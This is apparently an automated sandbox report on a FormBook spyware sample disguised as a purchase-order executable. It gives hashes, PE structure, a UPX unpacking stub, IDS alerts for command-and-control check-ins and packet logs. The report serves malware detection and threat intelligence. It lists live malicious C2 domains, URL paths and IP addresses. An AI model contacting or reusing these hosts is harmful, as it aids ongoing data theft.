Start date and time:	2025-01-15 19:39:02 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	New order BPD-003777.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@9/9
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 89% Number of executed functions: 114 Number of non-executed functions: 166
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target xTzxorEdKnFN.exe, PID 5580 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.248.169.48	MACHINE SPECIFICATIONS.exe	Get hash	malicious	FormBook	Browse	www.bonheur.tech/t3iv/
	trow.exe	Get hash	malicious	Unknown	Browse	www.findbc.com/
	QsBdpe1gK5.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.hasan.cloud/ve8l/
	HN1GiQ5tF7.exe	Get hash	malicious	FormBook	Browse	www.optimismbank.xyz/lnyv/
	qbSIgCrCgw.exe	Get hash	malicious	FormBook	Browse	www.tals.xyz/k1td/
	8L6MBxaJ2m.exe	Get hash	malicious	FormBook	Browse	www.bcg.services/5onp/
	z6tNjJC614.exe	Get hash	malicious	FormBook	Browse	www.tals.xyz/cpgr/
	rACq8Eaix6.exe	Get hash	malicious	FormBook	Browse	www.lirio.shop/qp0h/
	ydJaT4b5N8.exe	Get hash	malicious	FormBook	Browse	www.10000.space/3zfl/
	n2pGr8w21V.exe	Get hash	malicious	FormBook	Browse	www.lovel.shop/rxts/
104.21.32.1	DOCU800147001.exe	Get hash	malicious	GuLoader	Browse	b2csa.icu/PL341/index.php
	24010-KAPSON.exe	Get hash	malicious	Azorult, GuLoader	Browse	b2csa.icu/PL341/index.php
	bIcqeSVPW6.exe	Get hash	malicious	FormBook	Browse	www.rafconstrutora.online/sa6l/
	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	www.aziziyeescortg.xyz/2pcx/
	25IvlOVEB1.exe	Get hash	malicious	FormBook	Browse	www.masterqq.pro/3vdc/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	redroomaudio.com/administrator/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.blockconnect.tech	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	76.223.54.146

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ONEANDONE-ASBrauerstrasse48DE	PO -2025918.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	213.171.195.105
	bot.mips.elf	Get hash	malicious	Unknown	Browse	82.223.130.244
	https://www.xrmtoolbox.com/	Get hash	malicious	Unknown	Browse	74.208.236.123
	PO 2025918 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	213.171.195.105
	http://aeromorning.com	Get hash	malicious	Unknown	Browse	217.160.0.146
	trow.exe	Get hash	malicious	Unknown	Browse	74.208.236.101
	80P.exe	Get hash	malicious	I2PRAT	Browse	87.106.66.194
	1N6ZpdYnU3.exe	Get hash	malicious	FormBook	Browse	217.160.0.132
	plZuPtZoTk.exe	Get hash	malicious	FormBook	Browse	217.160.0.207
	6.elf	Get hash	malicious	Unknown	Browse	82.223.130.225
AMAZON-02US	QQE81XYXon.dll	Get hash	malicious	Wannacry	Browse	63.35.17.92
	PO -2025918.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.248.169.48
	txWVWM8Kx4.dll	Get hash	malicious	Wannacry	Browse	52.34.64.1
	hNgIvHRuTU.dll	Get hash	malicious	Wannacry	Browse	13.229.164.57
	https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQ	Get hash	malicious	Unknown	Browse	18.245.46.111
	q4e7rZQEkL.dll	Get hash	malicious	Wannacry	Browse	54.76.228.176
	firstontario.docx	Get hash	malicious	Unknown	Browse	54.69.238.133
	ACH REMITTANCE DOCUMENT 15.01.25.xlsb	Get hash	malicious	Unknown	Browse	54.176.115.71
	bot.x86.elf	Get hash	malicious	Unknown	Browse	34.214.77.3
	bot.arm5.elf	Get hash	malicious	Unknown	Browse	44.232.80.77
CLOUDFLARENETUS	main.exe	Get hash	malicious	Unknown	Browse	162.159.135.232
	main old source new token.exe	Get hash	malicious	Unknown	Browse	162.159.133.234
	main.exe	Get hash	malicious	Unknown	Browse	162.159.137.232
	RobloxPlayer DevBuildV2.653.952.exe	Get hash	malicious	Unknown	Browse	162.159.136.232
	BNXCXCJSD.jse	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	new-riii-1-b.pub.hta	Get hash	malicious	LummaC	Browse	172.67.194.161
	PO -2025918.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	188.114.97.3
	EZsrFTi.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.64.1
	random.exe	Get hash	malicious	LiteHTTP Bot	Browse	104.21.21.16
	NEWORDER.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1

Process:	C:\Windows\SysWOW64\colorcpl.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\proximobuccal

Download File

Process:	C:\Users\user\Desktop\New order BPD-003777.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.994577113541699
Encrypted:	true
SSDEEP:	6144:Z6iLCcZ1vrKGo4KLbR1dAzPTnYoXWNK1S95S:VecDvVd+R1dA9S+
MD5:	B9FA7D2CA30B32F673073E8C412FB0CE
SHA1:	65C51E64BC6DE8DDBBE788FF5100599B86AC2FE1
SHA-256:	C21AD33FC9A852A1C5AEE49891A91130420146F1665EFED116EE02784F8C4EF0
SHA-512:	F7C8B957930C7355596191DDAA6AD2350CE24F0144841D6E05AE551BB52F5DADAA47DCF41E27815E1165C1A2D633927F1AF616D5EB892443F695BEAF08856079
Malicious:	false
Reputation:	low
Preview:	.n.K0GCBPAUB..2F.UXTCWU4.K3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62F.UXTMH.:O.:.b.U..c.^[5e%*;$%4Yo(R)-- a7'bDG(e<6t...."$W"mOYKqBB62FEU!UJ.hT(..'$.i!2.X....5?.Y...s+T.Y...i"%.`/&=e4$.U4OK3GCB..UB.73F3bJ.CWU4OK3G.BV@^CI62.AUXTCWU4OK.VCBTQUBBF6FEU.TCGU4OI3GEBTAUBB64FEUXTCWUDKK3ECBTAUB@6r.EUHTCGU4OK#GCRTAUBB6"FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB6.2 -,TCWagKK3WCBT.QBB&2FEUXTCWU4OK3GcBT!UBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTAUBB62FEUXTCWU4OK3GCBTA

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.976788438699301
TrID:	Win32 Executable (generic) a (10002005/4) 99.39% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	New order BPD-003777.exe
File size:	1'178'112 bytes
MD5:	cdbcbd452bca36deca0ea24b88293819
SHA1:	8216c595da35091e155337251d9502b5ec4ef4b8
SHA256:	ab747891c631a8672fc8332ce62eb3fe52f8aee61babfec5b486758cae137363
SHA512:	cc2d7a7d9338b9d32844bb307ebcd630ee3ad81e7b2316d80f89e717f14985c828a474bfc18b62624f87733e897bc9fe171a7705a57c0eef7c116f46384c321d
SSDEEP:	24576:XiUmSB/o5d1ubcvAQ98rEn07H2KovYRz0o9VwcScZqCVboO:X/mU/ohubcvAQ9UY07H2KowJjtqCV
TLSH:	FE4523037282D896E12212F590799EA056603D309E86777AC791E7AFFC31346EE1F35E
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x5a77b0
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x678789A2 [Wed Jan 15 10:10:42 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	21371b611d91188d602926b15db6bd48

Entrypoint Preview

Instruction
pushad
mov esi, 0054B000h
lea edi, dword ptr [esi-0014A000h]
push edi
jmp 00007F2F6CE56D5Dh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F2F6CE56D59h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F2F6CE56D3Fh
mov eax, 00000001h
add ebx, ebx
jne 00007F2F6CE56D59h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F2F6CE56D5Dh
jne 00007F2F6CE56D7Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F2F6CE56D71h
dec eax
add ebx, ebx
jne 00007F2F6CE56D59h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F2F6CE56D26h
add ebx, ebx
jne 00007F2F6CE56D59h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F2F6CE56DA4h
xor ecx, ecx
sub eax, 03h
jc 00007F2F6CE56D63h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F2F6CE56DC7h
sar eax, 1
mov ebp, eax
jmp 00007F2F6CE56D5Dh
add ebx, ebx
jne 00007F2F6CE56D59h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F2F6CE56D1Eh
inc ecx
add ebx, ebx
jne 00007F2F6CE56D59h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F2F6CE56D10h
add ebx, ebx
jne 00007F2F6CE56D59h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F2F6CE56D41h
jne 00007F2F6CE56D5Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F2F6CE56D36h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007F2F6CE56D60h
mov al, byte ptr [edx]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x26a43c	0x424	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a8000	0xc243c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x26a860	0x14	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1a7994	0x18	UPX1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1a79b4	0xa0	UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x14a000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0x14b000	0x5d000	0x5cc00	e5834cda53f38d996b11d3e1e9cf1a95	False	0.9872151912061995	data	7.935890160484992	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1a8000	0xc3000	0xc2a00	0e07df043fba632db04d2498c36d4061	False	0.9737689165863841	data	7.97856299104181	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1a85ac	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0x1a86d8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0x1a8804	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0x1a8930	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0x1a8c1c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0x1a8d48	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0x1a9bf4	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0x1aa4a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0x1aaa0c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0x1acfb8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0x1ae064	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	empty	English	Great Britain	0
RT_STRING	0xda4f0	0x594	empty	English	Great Britain	0
RT_STRING	0xdaa84	0x68a	empty	English	Great Britain	0
RT_STRING	0xdb110	0x490	empty	English	Great Britain	0
RT_STRING	0xdb5a0	0x5fc	empty	English	Great Britain	0
RT_STRING	0xdbb9c	0x65c	empty	English	Great Britain	0
RT_STRING	0xdc1f8	0x466	empty	English	Great Britain	0
RT_STRING	0xdc660	0x158	empty	English	Great Britain	0
RT_RCDATA	0x1ae4d0	0xbb9d4	data			1.0003136109766444
RT_GROUP_ICON	0x269ea8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x269f24	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x269f3c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x269f54	0x14	data	English	Great Britain	1.25
RT_VERSION	0x269f6c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x26a04c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll	GetAce
COMCTL32.dll	ImageList_Remove
COMDLG32.dll	GetSaveFileNameW
GDI32.dll	LineTo
IPHLPAPI.DLL	IcmpSendEcho
MPR.dll	WNetGetConnectionW
ole32.dll	CoGetObject
OLEAUT32.dll	OleLoadPicture
PSAPI.DLL	GetProcessMemoryInfo
SHELL32.dll	DragFinish
USER32.dll	GetDC
USERENV.dll	LoadUserProfileW
UxTheme.dll	IsThemeActive
VERSION.dll	VerQueryValueW
WININET.dll	FtpOpenFileW
WINMM.dll	timeGetTime
WSOCK32.dll	connect

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-15T19:41:07.949280+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	64256	46.38.243.234	80	TCP
2025-01-15T19:41:23.489237+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64354	13.248.169.48	80	TCP
2025-01-15T19:41:26.054634+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64370	13.248.169.48	80	TCP
2025-01-15T19:41:28.603170+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64388	13.248.169.48	80	TCP
2025-01-15T19:41:31.133991+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	64404	13.248.169.48	80	TCP
2025-01-15T19:41:36.862021+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64438	217.160.0.207	80	TCP
2025-01-15T19:41:39.380475+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64439	217.160.0.207	80	TCP
2025-01-15T19:41:41.914818+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64440	217.160.0.207	80	TCP
2025-01-15T19:41:44.459079+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	64441	217.160.0.207	80	TCP
2025-01-15T19:41:50.284439+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64442	136.243.64.147	80	TCP
2025-01-15T19:41:52.744770+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64443	136.243.64.147	80	TCP
2025-01-15T19:41:55.289744+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64444	136.243.64.147	80	TCP
2025-01-15T19:41:57.829797+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	64445	136.243.64.147	80	TCP
2025-01-15T19:42:03.953573+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64446	162.218.30.235	80	TCP
2025-01-15T19:42:06.530685+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64447	162.218.30.235	80	TCP
2025-01-15T19:42:09.091406+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64448	162.218.30.235	80	TCP
2025-01-15T19:42:11.656959+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	64449	162.218.30.235	80	TCP
2025-01-15T19:42:17.328074+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64450	104.21.32.1	80	TCP
2025-01-15T19:42:19.873608+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64451	104.21.32.1	80	TCP
2025-01-15T19:42:22.439290+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64452	104.21.32.1	80	TCP
2025-01-15T19:42:24.976585+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	64453	104.21.32.1	80	TCP
2025-01-15T19:42:30.642921+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64454	162.0.236.169	80	TCP
2025-01-15T19:42:33.216253+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64455	162.0.236.169	80	TCP
2025-01-15T19:42:35.798206+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64456	162.0.236.169	80	TCP
2025-01-15T19:42:38.298340+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	64457	162.0.236.169	80	TCP
2025-01-15T19:42:44.020829+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64458	185.68.108.243	80	TCP
2025-01-15T19:42:46.558867+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64459	185.68.108.243	80	TCP
2025-01-15T19:42:49.115025+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64460	185.68.108.243	80	TCP
2025-01-15T19:42:51.639586+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	64461	185.68.108.243	80	TCP
2025-01-15T19:43:02.573791+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64462	172.67.183.191	80	TCP
2025-01-15T19:43:02.573791+0100	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	1	192.168.2.4	64462	172.67.183.191	80	TCP
2025-01-15T19:43:05.435795+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64463	172.67.183.191	80	TCP
2025-01-15T19:43:08.536807+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	64464	172.67.183.191	80	TCP
2025-01-15T19:43:11.457952+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	64465	172.67.183.191	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 19:40:23.081072092 CET	64165	53	192.168.2.4	1.1.1.1
Jan 15, 2025 19:40:23.085979939 CET	53	64165	1.1.1.1	192.168.2.4
Jan 15, 2025 19:40:23.086044073 CET	64165	53	192.168.2.4	1.1.1.1
Jan 15, 2025 19:40:23.090923071 CET	53	64165	1.1.1.1	192.168.2.4
Jan 15, 2025 19:40:23.544589996 CET	64165	53	192.168.2.4	1.1.1.1
Jan 15, 2025 19:40:23.549633980 CET	53	64165	1.1.1.1	192.168.2.4
Jan 15, 2025 19:40:23.549689054 CET	64165	53	192.168.2.4	1.1.1.1
Jan 15, 2025 19:41:07.287852049 CET	64256	80	192.168.2.4	46.38.243.234
Jan 15, 2025 19:41:07.292704105 CET	80	64256	46.38.243.234	192.168.2.4
Jan 15, 2025 19:41:07.292771101 CET	64256	80	192.168.2.4	46.38.243.234
Jan 15, 2025 19:41:07.303493977 CET	64256	80	192.168.2.4	46.38.243.234
Jan 15, 2025 19:41:07.323782921 CET	80	64256	46.38.243.234	192.168.2.4
Jan 15, 2025 19:41:07.949073076 CET	80	64256	46.38.243.234	192.168.2.4
Jan 15, 2025 19:41:07.949165106 CET	80	64256	46.38.243.234	192.168.2.4
Jan 15, 2025 19:41:07.949280024 CET	64256	80	192.168.2.4	46.38.243.234
Jan 15, 2025 19:41:07.952020884 CET	64256	80	192.168.2.4	46.38.243.234
Jan 15, 2025 19:41:07.957937002 CET	80	64256	46.38.243.234	192.168.2.4
Jan 15, 2025 19:41:23.022527933 CET	64354	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:23.027450085 CET	80	64354	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:23.027653933 CET	64354	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:23.042963982 CET	64354	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:23.047831059 CET	80	64354	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:23.488821030 CET	80	64354	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:23.489152908 CET	80	64354	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:23.489237070 CET	64354	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:24.558419943 CET	64354	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:25.575383902 CET	64370	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:25.580250025 CET	80	64370	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:25.580343962 CET	64370	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:25.598872900 CET	64370	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:25.603679895 CET	80	64370	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:26.054461956 CET	80	64370	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:26.054584026 CET	80	64370	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:26.054634094 CET	64370	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:27.104429960 CET	64370	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:28.122611046 CET	64388	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:28.128638983 CET	80	64388	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:28.130351067 CET	64388	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:28.146150112 CET	64388	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:28.151226997 CET	80	64388	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:28.151242018 CET	80	64388	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:28.151249886 CET	80	64388	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:28.151257992 CET	80	64388	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:28.151278973 CET	80	64388	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:28.151287079 CET	80	64388	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:28.151303053 CET	80	64388	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:28.151319027 CET	80	64388	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:28.151330948 CET	80	64388	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:28.596826077 CET	80	64388	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:28.603100061 CET	80	64388	13.248.169.48	192.168.2.4
